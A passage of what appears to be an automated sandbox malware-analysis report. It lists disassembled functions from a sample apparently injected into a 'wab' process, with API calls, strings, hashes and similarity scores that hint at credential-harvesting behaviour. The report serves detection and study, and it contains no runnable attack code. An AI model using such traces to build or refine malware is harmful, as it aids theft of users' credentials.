                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                • String ID: sysdatetimepick32
                                                • API String ID: 1028950076-4169760276
                                                • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memset
                                                • String ID: -journal$-wal
                                                • API String ID: 438689982-2894717839
                                                • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Item$Dialog$MessageSend
                                                • String ID:
                                                • API String ID: 3975816621-0
                                                • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcsicmp.MSVCRT ref: 00444D09
                                                • _wcsicmp.MSVCRT ref: 00444D1E
                                                • _wcsicmp.MSVCRT ref: 00444D33
                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmp$wcslen$_memicmp
                                                • String ID: .save$http://$https://$log profile$signIn
                                                • API String ID: 1214746602-2708368587
                                                • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                • String ID:
                                                • API String ID: 2313361498-0
                                                • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 00405F65
                                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                • GetWindow.USER32(00000000), ref: 00405F80
                                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Window$ItemMessageRectSend$Client
                                                • String ID:
                                                • API String ID: 2047574939-0
                                                • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                • String ID:
                                                • API String ID: 4218492932-0
                                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                • memcpy.MSVCRT ref: 0044A8BF
                                                • memcpy.MSVCRT ref: 0044A90C
                                                • memcpy.MSVCRT ref: 0044A988
                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                • memcpy.MSVCRT ref: 0044A9D8
                                                • memcpy.MSVCRT ref: 0044AA19
                                                • memcpy.MSVCRT ref: 0044AA4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memset
                                                • String ID: gj
                                                • API String ID: 438689982-4203073231
                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy
                                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                • API String ID: 3510742995-2446657581
                                                • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                • memset.MSVCRT ref: 00405ABB
                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                • SetFocus.USER32(?), ref: 00405B76
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: MessageSend$FocusItemmemset
                                                • String ID:
                                                • API String ID: 4281309102-0
                                                • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _snwprintfwcscat
                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                • API String ID: 384018552-4153097237
                                                • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                • String ID: 0$6
                                                • API String ID: 2029023288-3849865405
                                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                • memset.MSVCRT ref: 00405455
                                                • memset.MSVCRT ref: 0040546C
                                                • memset.MSVCRT ref: 00405483
                                                • memcpy.MSVCRT ref: 00405498
                                                • memcpy.MSVCRT ref: 004054AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$memcpy$ErrorLast
                                                • String ID: 6$\
                                                • API String ID: 404372293-1284684873
                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                • wcscat.MSVCRT ref: 0040A0E6
                                                • wcscat.MSVCRT ref: 0040A0F5
                                                • wcscpy.MSVCRT ref: 0040A107
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                • String ID:
                                                • API String ID: 1331804452-0
                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                • String ID: advapi32.dll
                                                • API String ID: 2012295524-4050573280
                                                • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                • <%s>, xrefs: 004100A6
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$_snwprintf
                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                • API String ID: 3473751417-2880344631
                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcscat$_snwprintfmemset
                                                • String ID: %2.2X
                                                • API String ID: 2521778956-791839006
                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _snwprintfwcscpy
                                                • String ID: dialog_%d$general$menu_%d$strings
                                                • API String ID: 999028693-502967061
                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memsetstrlen
                                                • String ID:
                                                • API String ID: 2350177629-0
                                                • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset
                                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                • API String ID: 2221118986-1606337402
                                                • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                • String ID:
                                                • API String ID: 265355444-0
                                                • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                  • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                • memset.MSVCRT ref: 0040C439
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                • _wcsupr.MSVCRT ref: 0040C481
                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                • memset.MSVCRT ref: 0040C4D0
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                • String ID:
                                                • API String ID: 1973883786-0
                                                • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 004116FF
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
